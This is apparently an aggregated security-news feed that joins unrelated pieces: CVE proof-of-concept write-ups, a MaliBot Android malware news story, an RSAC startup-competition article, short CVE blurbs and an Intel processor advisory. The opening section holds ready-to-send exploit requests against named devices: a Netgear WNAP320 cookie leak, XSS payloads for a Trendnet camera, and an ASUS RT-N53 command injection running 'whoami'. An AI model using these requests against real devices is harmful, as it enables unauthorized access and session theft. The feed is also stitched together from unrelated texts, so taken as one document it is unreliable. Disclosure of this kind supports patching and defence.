netgear wnap320 router WNAP320_V2.0.3_firmware is vulnerable to Incorrect Access Control via /recreate.php, which can leak all users cookies.

Permalink

Cannot retrieve contributors at this time

There is an unauthorized vulnerability in wnap320, located in /recreate.php, which can leak all users' cookie

**http://ip/recreate.php**

    
    
    WNAP320_V2.0.3_firmware
    
    GET /recreate.php?username=admin 
    HTTP/1.1 Host: 192.168.0.100 
    Accept: text/javascript, text/html, application/xml, text/xml, / 
    X-Prototype-Version: 1.6.0.2 
    X-Requested-With: XMLHttpRequest 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
    Referer: http://192.168.0.100/index.php?page=master 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Connection: close
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31876: uai-poc/unauth.md at main · jayus0821/uai-poc

Trendnet IP-110wn camera fw_tv-ip110wn_v2(1.2.2.68) has an xss vulnerability via the proname parameter in /admin/scheprofile.cgi

Permalink

There is an xss vulnerability in ip110wn, the vulnerability point is located in the proname parameter in /admin/scheprofile.cgi

**http://ip/admin/scheprofile.cgi**

    
    
    fw_tv-ip110wn_v2(1.2.2.68)
    
    POST /admin/scheprofile.cgi 
    HTTP/1.1 Host: 192.168.73.129 
    Content-Length: 112 Cache-Control: max-age=0 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    Origin: http://192.168.73.129 
    Content-Type: application/x-www-form-urlencoded 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.73.129/admin/scheprofile.asp?en 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Connection: close
    
    mode=add&maxkey=&proname=");alert("123&name=&weekdays=radiobutton&weekday=&start_hr=&start_min=&end_hr=&end_min=
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31875: uai-poc/xss1.md at main · jayus0821/uai-poc

ASUS RT-N53 3.0.0.4.376.3754 has a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface.

Permalink

Cannot retrieve contributors at this time

There is a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface in RT-N53

**http://ip/apply.cgi**

    
    
    RT-N53 (Version 3.0.0.4.376.3754)
    
    GET /apply.cgi?current_page=Main_WOL_Content.asp&next_page=Main_WOL_Content.asp&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ether-wake+-i+br0+whoami&firmver=3.0.0.4&destIP=ccccc&wollist_deviceName=&wollist_macAddr= HTTP/1.1 
    Host: 192.168.1.1 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.1.1/Main_WOL_Content.asp 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Cookie: clock_type=1; hwaddr=52:54:00:12:34:57; bw_24refresh=1; ymd=2; bw_rtab=WIRELESS1 
    Connection: close
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31874: uai-poc/command injection.md at main · jayus0821/uai-poc

Trendnet IP-110wn camera fw_tv-ip110wn_v2(1.2.2.68) has an XSS vulnerability via the prefix parameter in /admin/general.cgi.

Permalink

There is an xss vulnerability in ip110wn, the vulnerability point is located in the prefix parameter in /admin/general.cgi

**http://ip/admin/general.cgi**

    
    
    fw_tv-ip110wn_v2(1.2.2.68)
    
    POST /admin/general.cgi
    HTTP/1.1 Host: 192.168.73.129 
    Content-Length: 112 Cache-Control: max-age=0 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    Origin: http://192.168.73.129 
    Content-Type: application/x-www-form-urlencoded 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.73.129/admin/scheprofile.asp?en 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Connection: close
    
    prefix=123"><script>alert(123)</script><a&duration=20&gpioduration=20
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31873: uai-poc/xss2.md at main · jayus0821/uai-poc

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 4.10.11 and 5.2.2, the certificate in the Parse Server Apple Game Center auth adapter not validated. As a result, authentication could potentially be bypassed by making a fake certificate accessible via certain Apple domains and providing the URL to that certificate in an authData object. Versions 4.0.11 and 5.2.2 prevent this by introducing a new `rootCertificateUrl` property to the Parse Server Apple Game Center auth adapter which takes the URL to the root certificate of Apple's Game Center authentication certificate. If no value is set, the `rootCertificateUrl` property defaults to the URL of the current root certificate as of May 27, 2022. Keep in mind that the root certificate can change at any time and that it is the developer's responsibility to keep the root certificate URL up-to-date when using the Parse Server Apple Game Center auth adapter. There are no known workarounds for this issue.

CVE-2022-31083: Latest News - Apple Developer

By Deeba Ahmed
MaliBot Android Malware is also capable of bypassing 2FA (Two-factor authentication). F5 Labs researchers have discovered a new…
This is a post from HackRead.com Read the original post: New MaliBot Android Malware Found Stealing Personal, Banking Data

****MaliBot Android Malware is also capable of bypassing 2FA (Two-factor authentication).****

F5 Labs researchers have discovered a new Android malware family that can exfiltrate personal and financial data after compromising devices. According to researchers, the malware can not only bypass multi-factor authentication processes, but can also steal banking data, passwords, and cryptocurrency wallets.

It is worth noting that the malware is distributed through fraudulent websites and tricks victims into downloading it, thinking it is a popular cryptocurrency tracking app. It is also distributed through smishing.

Furthermore, researchers have identified two malicious sites distributing MaliBot. One of them is a fake version of TheCryptoApp that boasts over a million downloads on the Google Play Store.

**Details of MaliBot**

F5 Labs has dubbed the Android malware MaliBot. This powerful malware disguised as a cryptocurrency mining application may pretend to be another app or a Chrome browser. It asks the user for accessibility and launcher permissions when downloaded to monitor the device and carry out its malicious operations.

MaliBot uses a Virtual Network Computing (VNC) server implementation to gain control of the infected devices. Once it infects a device, it starts exfiltrating financial data and steals PII (personally identifiable information) and cryptocurrency wallet information.

Research revealed that the malware’s C2 server is based in Russia and the servers are the same that were previously used for distributing the Sality malware. From June 2020, the IP was used to launch different malware campaigns.

**MaliBot Capabilities**

MaliBot has diverse capabilities, such as it supports web injections and can be used in overlay attacks. It can run and delete applications and steal sensitive data such as MFA codes, cookies, SMS messages, etc.

It can remotely steal passwords and access text messages, crypto wallet information, web browser cookies, bank details, and capture screenshots from compromised devices. It can also bypass MFA protection.

It mainly abuses the Android Accessibility API that lets it perform specific actions without asking for user permission or interaction and maintain persistence on the infected device. It also bypasses 2FA processes by validating Google prompts via the Accessibility API and steals 2FA codes, which are later transferred to the attacker.

When distributed via SMS messages, the malware can log exceptions and registers itself as a launcher. Bypassing protections around crypto wallets lets the attackers steal bitcoins and other cryptocurrencies from the victim’s wallet linked to the infected device.

Lastly, like FluBot, MaliBot can send SMS messages to other users to spread the infection chain. Currently, this campaign is targeting Spanish and Italian bank customers, but the scope of infection may soon broaden, F5 Labs researcher Dor Nizar noted.

**More Android Malware News**

*   Authorities Take Down SMS-based FluBot Android Spyware
*   Predator Spyware Using Zero-day to Target Android Devices
*   Ginp Android trojan targets banking apps & threaten 2FA/SMS
*   HiddenMiner Android Monero Mining Malware Cause Device Failure
*   New Android banking malware Xenomorph found in Play Store apps

New MaliBot Android Malware Found Stealing Personal, Banking Data

A secure Web browser takes the top prize, and for the second year in a row malware detection is an afterthought.

**RSA CONFERENCE 2022 –** RSAC's Innovation Sandbox is a _Shark Tank_\-like competition, bringing 10 startup finalists to present onstage before judges.

Talon Security seized the first-place prize with a bold vision for the corporate Web browser of the future. For those thinking the browser is too competitive a market to take on, Talon's pitch makes intriguing arguments.

Deploying any kind of traditional security controls or software across operating systems, and into third-party contractors or personal devices, is logistically difficult or impossible. Yet Web browsers can be deployed by any user without admin privileges. In 2019, Microsoft consolidated under Google's open source Chromium code base, so Talon's Chromium browser should enjoy broad device and Web compatibility.

After requiring users to have Talon's browser to access their clouds, corporations then gain centralized management to control access levels. Talon ensures privileged data stays contained within the browser, as it can block saving, screen capture, or cut and paste.

Talon is not the only startup stretching our understanding of security's future. With these nine other innovative finalists, three trends have emerged.

**Core Security Still Being Reimagined**

Many of these entrepreneurs proposed bold visions for reimagining cloud security. Zero trust has been a popular approach, centralizing continuous authorization, device attestation, and taking the least-privilege approach in the cloud. Sharon Goldberg, CEO of the second-place finisher, BastionZero, takes issue with even calling today's solutions zero trust, "when really they create a single point of compromise."

BastionZero's founders came out of the cryptography world, where decentralized encryption, such as that in Bitcoin, and Transport Layer Security (TLS) are common. BastionZero enables engineers and build processes to authenticate to the cloud using multiple roots of trust. With this differentiator, if one root is compromised, organizations still maintain control.

Attack surface management company SevCo is the brainchild of JJ Guy and Greg Fitzgerald, the founders of Carbon Black and Cylance, respectively. Attempts at device inventories have always been an industry failure, and the problem has become worse with our remote and rapidly churning workforce.

SevCo's real-time streaming platform continuously correlates inventory from many sources through APIs. They record suspicious changes over time and are expecting to tame the problem of unmanaged and malicious devices reaching into clouds.

**Risk Management for Data, Privacy, and DevOps**

Unlike past years at Innovation Sandbox, the majority of 2022 finalists sell to users who do not report to the CISO. Talon's Web browser, SevCo's IT inventory, and BastionZero's authentication are more likely to fall under the CIO. Judges are surely sensitive to the demand for securing post-cloud IT infrastructure and defending digitization across organizations.

Another trio of startups in the competition emphasized working across these departments. Dasera frees data security that's been siloed within data, IT, and privacy teams. It visualizes data context, automates workflows, and coordinates policy and actions. Dasera ends up being a single pane of glass to visualize and manage data security across multiple departments and throughout its life cycle.

Torq is using a no-code approach that's seen recent success in automating cloud operations. It allows security professionals to visually build automation without the help of programmers, reducing costs. In addition to automating incident response, Torq can seamlessly coordinate with IT on the growing backlog of account provisioning, caused by identity attacks.

SecDevOps startup Cycode reaches across the organization to defend DevOps' entire pipeline: from application code to open source libraries and deployment paths. Cycode also automates remediation workflows to reduce costs.

**Cloud Security Focuses on APIs, Over-Permissioning**

Malware is still big on endpoints but receives less emphasis in cloud security. It's difficult for hackers to ensure their malware runs in the cloud near the data they target, especially with technologies like "serverless" containers and lambda functions. From what we know today, hackers are more likely to make API calls into or across the cloud, often sitting at their own devices behind anonymized IPs.

The cloud's crown jewels are applications and APIs that are exposed to the outside by design, said Neosec founder Giora Engel. Attackers can access them directly with credentials — whether legitimate or stolen. Hence the cloud security adage, "Hackers don’t break in, they log in." Neosec leverages API gateways, like Google Apigee. It discovers an organization's APIs, detects their vulnerabilities, and monitors use and abuse. Neosec wields behavioral analytics and offers a managed detection and response service on top.

Lightspin also doesn't focus on malware detection but manages cloud posture and protects workloads through a unique graph technology. Less-experienced analysts can visualize the most critical attack paths where vulnerabilities and configurations need closing. It's one of the easier products to use in its space.

Meanwhile, Cado Security brings forensics and incident response to cloud workloads. Instead of placing agents inside these workloads, Cado obtains cloned images of their disk, memory, and surrounding logfiles. Since offline forensic analysis has zero impact on high-availability workloads, cloud forensics has exciting potential.

Cado is one of the few examining binary files and processes inside workloads. It doesn't tout specific malware detection, yet allows searching for malware indicators and visualizing timelines.

Araali Networks is bucking the trend and places agents into the private cloud, leveraging Kubernetes DaemonSets and Linux's extended Berkeley Packet Filter (eBPF). Araali examines network traffic, enforces policies, and blocks malicious code.

Innovation Sandbox 2022 was a barometer for the rapid industry changes that are underway to secure the cloud. Cybersecurity must defend digitization across IT, data, privacy, and DevOps. It's a different world, where threats are a lot bigger than just malware.

RSAC Startup Competition Focuses on Post-Cloud IT Infrastructure

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability.

CVE-2022-22021

Zooms On-Premise Meeting Connector MMR before version 4.8.113.20220526 fails to properly check the permissions of a Zoom meeting attendee. As a result, a threat actor in the Zooms waiting room can join the meeting without the consent of the host.

CVE-2022-28749: Security Bulletin

Incomplete cleanup in specific special register write operations for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors MMIO Stale Data Advisory**

**Summary: **

Potential security vulnerabilities in Memory Mapped I/O (MMIO) for some Intel® Processors may allow information disclosure. Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-21123

Description: Incomplete cleanup of multi-core shared buffers for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.1 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

CVEID: CVE-2022-21125

Description: Incomplete cleanup of microarchitectural fill buffers on some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-21127

Description: Incomplete cleanup in specific special register read operations for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVEID: CVE-2022-21166

Description: Incomplete cleanup in specific special register write operations for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**Affected Products:**

Some Intel® Processors, see full list:

https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html

**Recommendations:**

Intel recommends that users of the affected Intel® Processors update to the latest version provided by the system manufacturer that addresses these issues.

Intel® SGX PSW for Windows to version 2.16.100.3 or later: 

https://registrationcenter.intel.com/en/products/download/3406/

Intel® SGX SDK for Windows to version 2.16.100.3 or later:

https://registrationcenter.intel.com/en/products/download/3407/

Intel® SGX DCAP for Windows to version 1.14.100.3 or later:

https://registrationcenter.intel.com/en/products/download/3610/

Intel® SGX PSW for Linux to version 2.17.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

Intel® SGX SDK for Linux to version 2.17.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

Intel® SGX DCAP for Linux to version 1.14.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

To address this issue, an SGX TCB recovery is planned for Q2 2022. Customers will require the software update to get successful attestation responses. For customers using the Intel Attestation Service (IAS), the IAS Development Environment (DEV) will enforce the microcode and software updates beginning June 21, 2022 and the IAS Production Environment (LIV) will enforce the updates beginning July 19, 2022.

For customers that are not using IAS, but instead are constructing their own attestation infrastructure using the Intel® SGX Provisioning Certificate Service (PCS), updated Endorsements/Reference Values (i.e., PCK Certificates and verification collateral) will be available June 28, 2022. These customers decide when to enforce the microcode and software update, as part of their Appraisal Policies.

Refer to Intel® SGX Attestation Technical Details for more information on the SGX TCB recovery process.

Further TCB Recovery Guidance for developers is available. 

**Acknowledgements:**

The following issues were found internally by Intel employees.  Intel would like to thank Ke Sun, Alan Miller, Shlomi Alkalay, Robert Jones, Ezra Caltum for reporting CVE-2022-21123, CVE-2022-21125, CVE-2022-21127, CVE-2022-21166. Jason Kilman for reporting CVE-2022-21123, CVE-2022-21127, and Scott Cape and Anthony Wojciechowski for reporting CVE-2022-21127.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/14/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#chrome